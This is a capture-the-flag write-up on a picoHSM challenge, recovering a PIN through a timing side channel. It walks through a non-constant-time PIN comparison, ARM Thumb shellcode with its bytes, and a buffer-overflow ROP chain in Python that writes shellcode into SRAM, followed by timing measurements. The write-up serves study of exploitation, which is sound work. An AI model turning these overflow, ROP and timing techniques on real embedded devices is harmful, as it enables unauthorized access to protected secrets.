Donjon CTF: picoHSM series write-up (2/3)

Here is my write-up of the second challenge, “picoHSM Good Times”. This post is the continuation of the first challenge writeup.

Challenge 2 description

According to the description, the aim is to to find the PIN value. The description comes with a main.cxx file, leaking some source code. From this file, it can be understood that the MCU is communicating with a peripheral via UART, and both devices are communicating using usart read and write functions. The source code is part of what’s running on the UART peripheral. The UART peripheral is also in charge of the PIN verification, as well as decrypt and encrypt operations.

A quick glance on the PIN verification routine shows that there is a weakness that could be exploited.

[...] 
* Process PIN verification. Reads 8 digits from the UART and compare with the
 * correct PIN. Does not reply on UART.
 *
 * @return 1 if PIN is correct, 0 otherwise.
 */
uint8_t verify_pin(){
    // Get input pin from UART
    uint8_t buffer[8];
    for (uint8_t i = 0; i < 8; ++i)
        buffer[i] = uart_read_u8();
    uint8_t good = 1;
    for (uint8_t i = 0; i < 8; ++i){
        if (pin[i] != buffer[i]){
            good = 0;
            break;
        }
    }
    return good;
}
[...]

The PIN verification is not time constant. The submitted PIN is verified against a reference PIN, digit per digit, and as soon as a wrong digit is detected, the verification stops. So it is possible to submit all the possible digits candidates one by one, and the consumed time can be measured, then the PIN can be bruteforced, digit per digit. In addition, there is no PIN Try Counter: unlimited attempts are possible! So a timing attack is definitely possible.

At first, I naively tried to measure the time between the command is sent over the network, and the response is received. But this led me nowhere: the network latency was very unstable, and the time variation between two requests was very high, compared to the order of magnitude of how much time an instruction would take to execute on the UART peripheral.

Indeed this code is running on a UART peripheral, which is likely to be another MCU, so it is still running relatively fast, and the time difference between a wrong digit and a bad digit would only take a few instructions.

To simplify, let’s assume that it runs at 1MHz, and one instruction cycle takes one clock cycle, then one instruction would be executed in 10-6s… How could you measure a difference of 10-6s while having some milliseconds latency because of the network?

Moreover, remember when I said in the previous writeup that there was a timeout of 15 seconds on the boards ? Bruteforcing the PIN value is not possible, because it would take too much time to test all the possible PIN values. Basically, you would need to wait for 15 seconds after connecting to one board. Even if you monopolize the 10 boards to perform the bruteforce 😈, it would still take too much time 😓…

The code on the MCU performing the PIN verification and then displaying whether the PIN was correct looks like this:

Decompiled code of the PIN verification in the binary

So I came up with an idea of writing a shellcode to call verify_pin() function a lot of times, with the same PIN. If I could somehow manage to make the submitted PIN being verified, let’s say 1000 times, then the time difference between the first wrong digit checked and the first correct digit would be multiplied by 1000. In fact, I needed to do as many PIN verification as needed, within one command, so that the time variation would be higher than the network latency variation. The algorithm I used was something like that:

  • Set a loop counter to a desired value
  • Set the PIN address in R0, parameter of verify_pin()
  • Call verify_pin()
  • Decrement the loop counter and check if it is null.
    • If it is not null, go back to set the PIN address in R0.
    • If it is null, then display something i.e. care about verify_pin() return value: jump on the instruction testing the return value, before printing “Invalid PIN” or “PIN OK[…]”.

This last step is mandatory, since I must have a way to get a response, in order to be able to measure the elapsed time between the sent command and the received response.

I used the following shellcode:

; R3: @verify_pin() + 1
; R5: @ to (PIN@ - 4). This means that R5 points to a memory location where (PIN@ - 4) is stored
; R6: the loop counter
; other registers: don't care

MOV R6, #32768     ; The number 32768 will be explained later.
LDR R0, [R5, #4]   ; <--- go here to loop
BLX R3
SUBS R6, R6, #1
BNE #0xfffffffa    ; branch to LDR R0, [R5, #4] if R6 is not 0
MOV R6, #8         ; restore R6 with #8
POP {R3-R5, PC}

; shellcode: 48 F2 01 46 68 68 98 47 76 1E FB D1 4F F0 08 06 38 BD

Once this shellcode finished its execution, I could just connect the execution back to the existing code, as if the BL verify_pin instruction was called, in the execution of handle_client() function. The program would continue as if a normal pin verification command was issued, and would display whether the PIN was incorrect.

The picture above showing an extract of execute_command() function can be divided into 4 blocks:

  • The code block #1 is testing the length of the PIN string, and storing the PIN length in R6. That’s why I restored R6 with the value of 8 in my shellcode.
  • The code block #2 is calling verify_pin() with the PIN string address, and is branching to code block #4 if the result is 0. Otherwise, it branches to the code block #3.
  • The code block #3 is printing “PIN OK[…]” with the flag, if the PIN is correct.
  • The code block #4 is printing “Invalid PIN”.

Therefore, making the shellcode returning to CBZ at address 0x08000474 (highlighted by the red box on the previous picture) would be great, since a string would be printed in the socket, with a different string if the PIN is correct or not. That’s what I wanted.

Also, the reason why I used LDR R0, [R5, #4] to load the PIN address is because the existing code in execute_command() function is referencing the PIN address like that. As a consequence, the instruction LDR R1, [R5,#4] at the address 0x0800047E would be compatible with my shellcode, without any extra effort!


At first, I wrote a little POC to execute a tiny shellcode on the stack. Basically, I tried to redirect code execution on the stack, and I put a POP {R4, LR} shellcode on the stack, to redirect the code execution to the location I called print_flag() function (cf. write-up on the first challenge). Pictures might be self-explanatory rather than plenty of words 😁:

Basic idea of returning to stack 1/2
Basic idea of returning to stack 2/2

But it did not work 😭.

After struggling for a while, I finally assumed that the stack was not executable for an unknown reason 🤔.

So I decided to ROP. Here is a small ROP payload that enabled me to print the first flag.

[...]
gadget_pop_R3_R4_R5_PC = p32(0x08000226 + 1)  # POP {R3-R5,PC}
print_flag = p32(0x0800040a + 1)              # print_flag address
R4 = p32(0xe1001fd8)
R4_adjusted = p32(0xe1001fd8 + 0x4*8)         # socket address
garbage = p32(0)

s = b'a'*0x300 + R4 + gadget_pop_R3_R4_R5_PC                 #1
s += socket + p32(0) + garbage + gadget_pop_R3_R4_R5_PC      #2
s += garbage + R4_adjusted + garbage + print_flag            #3
s += socket + p32(0)                                         #4

Some explanations now (let’s try plenty of words 😁):

  • Line #1 comes directly from the first challenge: 0x300 bytes are needed to fill the buffer, then R4 will point to socket, and gadget_pop_R3_R4_R5_PC will overwrite the saved LR. When handle_client() epilog is executed, i.e. POP {R4, PC}, the POP {R3-R5, PC} gadget address is put in PC. When this gadget is executed, the first 3 following values on the stack are put in R3, R4, R5 in this order, and the last one is put in LR. SP would then be incremented by 4*4 bytes, since 4 values are popped out. In fact, all the values from line #2 would be popped from the stack into these registers.
  • Line #2: in order to get working payloads, after thorough testing, it appeared that I could not mess with the two following 4-bytes values, which are the socket object, and the null byte. This is likely because socket is used by handle_client() function, so overflowing it too soon might crash the program. So the first two values are untouchable, and I decided not to do anything special. So again, POP {R3-R5,PC} is executed, and all the values from line #3 are popped from the stack into these registers.
  • Line #3: at this point, PC is set with what I called the print_flag() address, a location where arguments are set in R0 and R1, right before branching on the socket_t::print() function that would display the first flag. Since the first parameter R0 of socket_t::print() function is set from R4, I needed to set R4 with the stack address where the socket and the null byte could be found. I could not reference the previous address of socket since it might be erased by the stack space needed by socket_t::print() function to execute. So I needed to put these values again somewhere on the stack.
  • Line #4: This is where I put again the socket and the null byte.

ROP works, of course, since the ROP gadgets are executable code. As long as you put relevant controlled values on the stack, you can execute code. But only using POP {Rx-Ry, PC}-like gadgets cannot let me to write a shellcode that would perform 1000 or 10000 PIN verifications.

Since the stack is not executable, ROP is the only solution, what else could I do? Maybe I could find a way to write a shellcode on an executable section. So, using ROPgadget, I searched for the available ROP gadgets in THUMB mode, and I filtered the results:

$ ROPgadget --binary firmware-mcu.elf --rawArch ARM --thumb --depth 2 | grep -v "bx lr" | grep -v "bxlt lr" | grep -v "blx lr"
 Gadgets information
 0x08000224 : adcs r0, r3 ; pop {r3, r4, r5, pc}
 0x080009bc : add sp, #0x10 ; pop {r4, pc}
 0x080011a2 : add sp, #0x14 ; pop {r4, r5, r6, r7, pc}
 0x0800043e : add sp, #0xc ; pop {r4, r5, r6, r7, pc}
 0x0800120a : add sp, #8 ; pop {r4, pc}
 0x08000932 : b #0x8000926 ; pop {r4, r5, r6, pc}
 0x0800097a : b #0x800096e ; pop {r4, r5, r6, pc}
 0x08000990 : b #0x8000986 ; pop {r3, r4, r5, pc}
 0x08000f70 : b #0x8000f50 ; pop {r3, r4, r5, r6, r7, pc}
 0x08001102 : b #0x80010f0 ; pop {r4, pc}
 0x080011c4 : b #0x80011b6 ; pop {r4, r5, r6, pc}
 0x0800063e : blx r3
 0x08000ca6 : bne #0x8000cac ; pop {r3, r4, r5, r6, r7, pc}
 0x08000530 : ldrb r0, [r1, #0x15] ; pop {r4, pc}
 0x08000cc0 : mov r0, r4 ; pop {r4, pc}
 0x08001164 : movs r0, #1 ; pop {r4, r5, pc}
 0x08000cd8 : pop {r3, pc}
 0x08000226 : pop {r3, r4, r5, pc}
 0x08000ca8 : pop {r3, r4, r5, r6, r7, pc}
 0x08000532 : pop {r4, pc}
 0x08001162 : pop {r4, r5, pc}
 0x080008a4 : pop {r4, r5, r6, pc}
 0x08000440 : pop {r4, r5, r6, r7, pc}
 0x080001b0 : push.w {r4, r5, r6, r7, r8, sb, sl, lr}
 0x080008a2 : str r2, [r3, #0xc] ; pop {r4, r5, r6, pc}
 0x08001160 : str r3, [r1] ; pop {r4, r5, pc}
 0x08000912 : str r5, [r3, #4] ; pop {r3, r4, r5, pc}
 0x080010be : subs r0, r3, r0 ; pop {r4, pc}
 0x0800063c : subs r3, #4 ; blx r3
 0x08000af6 : uxtb r0, r0 ; pop {r4, pc}

I removed all the gadgets ending with BX LR-like instructions, because there is no way to control LR. Also, I limited the depth to 2 in order to keep the simplest ROP gadgets.

And I found the ROP gadget that would let me write my custom shellcode anywhere:

address 0x08000912: STR R5, [R3,#4]; POP {R3-R5,PC}

If R5 contains the 4-byte value to write, and (R3-4) points to the memory address to write, then this gadget gives arbitrary write ability. In addition, a lot of gadgets enable to pop some values into R3 and R5 registers.

So I tried to write a ROP chain that would write something at a chosen address, then would end by jumping on the previous print_flag() function. After some attempts, I finally chose 0x20001000, which is part of the SRAM address range, according to the reference manual of the STM32F chip series. Here is the payload for this ROP chain.

[...]
buf_adr = 0xe1001cd0
sram_adr = 0x20001000
gadget_write = p32(0x08000912 + 1)
#assuming that shellcode is a list of 4-bytes values

s = b'a'*0x300 + p32(R4) + gadget_pop_R3_R4_R5_PC                  
s += socket + p32(0) + p32(0) + gadget_pop_R3_R4_R5_PC

#write the shellcode 4 bytes per 4 bytes, using gadget_write
for i in range(len(shellcode)):
   s += p32(sram_adr+4*i-4) + p32(0) + p32(shellcode[i]) + gadget_write
   #           R3               R4            R5               PC

s += p32(0)
R4_adjusted = p32(buf_adr + len(s) + 4*3)      #improved computation
s += R4_adjusted + p32(0) + print_flag               
s += socket + p32(0)                                               

R4_adjusted, the value that R4 will take at the end to point on socket, can be computed like this:

  • take the buffer starting address;
  • add the number of bytes written so far to it;
  • then, add the number of bytes that will be written before writing socket, R4_adjusted included.

I tested my script using a tiny shellcode. That enabled me to debug my code, as well as finding a writable address. Indeed, when I managed to get the first flag displayed, that meant that my shellcode fully executed and the write gadget did not trigger a memory exception. However, when it was not working, a memory exception was likely to be triggered (for instance because the memory address was not writable), since I did not have the first flag displayed.

Here is a picture showing what should happen when chaining the ROP write gadget several times.

SP and memory evolution while using ROP write gadget

Now it’s time to reassemble the pieces of the puzzle!

I replaced the shellcode array with my custom shellcode that loops several times on the verify_pin() function.

"""
R3: @verify_PIN (first instruction) : 0x080001FC+1
R4: Don't care
R5: (@ to @PIN) minus 4 = buf_adr+8. @PIN is written at buf[0xc], so R5 must be equal to &buf[0x8].
R6: contains #32768

MOV R6, #32768              ||48 F2 00 06||
LDR R0, [R5, #4]            ||68 68||
BLX R3                      ||98 47||
SUBS R6,R6,#1               ||76 1E||
BNE 0xfffffffa              ||FB D1||
MOV R6, #8                  ||4F F0 08 06||
POP {R3-R5, PC}             ||38 BD||
"""

I also needed to tune the end of my ROP chain, so that socket_t::print() function could be correctly invoked. The last ROP gadget should enable me to do this:

Layout of the end of ROP chain, stack evolution

I increased the number of verify_pin() function executions using powers of 2 until the time difference was noticeable enough. After a few tries, with 32768 verify_pin() function executions, I had to wait for about 10 seconds per command, and the time difference order of magnitude was something around 10-1s.

The final payload looked like this:

  • First, let’s initialize some values:
payload = gen_payload("48F20006 6868 9847 761E FBD1 4FF00806 38BD")
# => [0x0600f248, 0x47986868, 0xd1fb1e76, 0x0608f04f, 0x0000bd38, 0x00000000]

sram_adr = 0x20001000
verify_pin = p32(0x080001FC + 1)
buf_adr = p32(0xe1001cd0)
R4_0 = p32(0xe1001fd8)
gadget_write = p32(0x08000912 + 1)
socket = p32(0xe1000010)

#garbage could be any value
garbage = p32(0)
  • Then, let’s fill the buffer. Here is the layout of my buffer where I put the PIN.
Buffer layout with the PIN string
#PIN is the PIN string to be tested
s = bytes(PIN, "utf-8") + b' '*4 + buf_adr
s += b'a'*(0x300-4*4)

#R5_buf_adr is the (address of @PIN) minus 4: buf_adr + 0xc - 4
R5_buf_adr = p32(0xe1001cd0 + 8)
  • Now comes the buffer overflow. Write the shellcode, and jump on it.
#Start the buffer overflow
s += R4_0 + gadget_R3_R4_R5_PC

#The first 2 values after the first gadget must not be modified!
#i.e. sock_adr + null byte
s += sock_adr + p32(0) + garbage + gadget_R3_R4_R5_PC

#Now write the shellcode, 4 bytes per 4 bytes, using ROP write gadget.
gadget_write = p32(0x08000912 + 1)
for i in range(len(payload)):
    s += p32(sram_adr+i*4-4) + garbage + p32(payload[i]) + gadget_write

#Now, jump at the written shellcode location!
#gadget_write ends with POP {R3-R5, PC}, so 4 values are needed.
s += verify_pin + garbage + R5_buf_adr + p32(sram_adr + 1)
  • Finally, tune the end of the ROP payload to get a displayed string:
"""
When shellcode finishes, a POP {R3-R5, PC} is executed.
- Don't care about R3
- Need to restore R5 with (@ of @PIN)-4
- Need to restore R4 with @socket
- Need to restore PC with the code location where the normal "BL verify_pin" is expected to return: verify_final
"""

verify_final = p32(0x0800046E + 1)
s += garbage
R4_adjusted = 0xe1001cd0 + len(s) + 4*3
s += p32(R4_adjusted) + R5_buf_adr + verify_final

#Put socket and null byte again on the stack
s += socket + p32(0)

With the network latency variation, I also needed to send the same payload several times to test a same digit. For each digit position, I looped 10 times for all 10 candidate digits, and I kept the minimum time for each candidate. I also put a delay of 1 second between each attempt, and I let it run for 1-2 hours.

Sometimes, the time variation was not discriminating enough, so I ran my script again with a fewer number of loops, in order to adjust the results I already obtained.

Each time a digit position is fully tested, the highest time among all the obtained times gives the correct digit, for each position.

Here is an extract of the results I obtained:

Digit found: position 0 value 1
 0: 9.639243
 1: 9.776046 <----
 2: 9.687355
 3: 9.639673
 4: 9.639635
 5: 9.687455
 6: 9.680712
 7: 9.634664
 8: 9.643451
 9: 9.686617
 Found PIN
 1-------
Digit found: position 1 value 3
 0: 9.775847
 1: 9.782995
 2: 9.873782
 3: 9.936396 <----
 4: 9.789476
 5: 9.903246
 6: 9.797092
 7: 9.880422
 8: 9.883297
 9: 9.787037
 Found PIN
 13------
Digit found: position 2 value 3
 0: 9.938494
 1: 9.997941
 2: 9.937933
 3: 10.093648 <----
 4: 9.940551
 5: 9.938602
 6: 9.961712
 7: 9.927008
 8: 9.939361
 9: 9.919161
 Found PIN
 133-----
[...]

I quickly automated the process by trying to connect to another board each time the connection failed 😈 (Yes, I smelled the flag coming… sorry 😁!). It looked like this:

End of the timing attack

So 13372020 seemed to be the correct PIN. I checked manually, and I got the second flag!

Second flag check!

So that was quite a painful challenge for 150 points! It appeared that there was a simpler solution, and it was not intended to be solved like this.

I assumed that the buffer was located at 0xe1001cd0, so the stack was not executable. But later I found out that other people managed to get code execution on stack using 0x20001cd0 🤯. Still wondering why I found stack addresses starting with 0xe1—— .

But I was glad to manage to solve it like this. It let me sharpen my ROP and shellcode writing skills 😁.

Scripts available here.

Leave a comment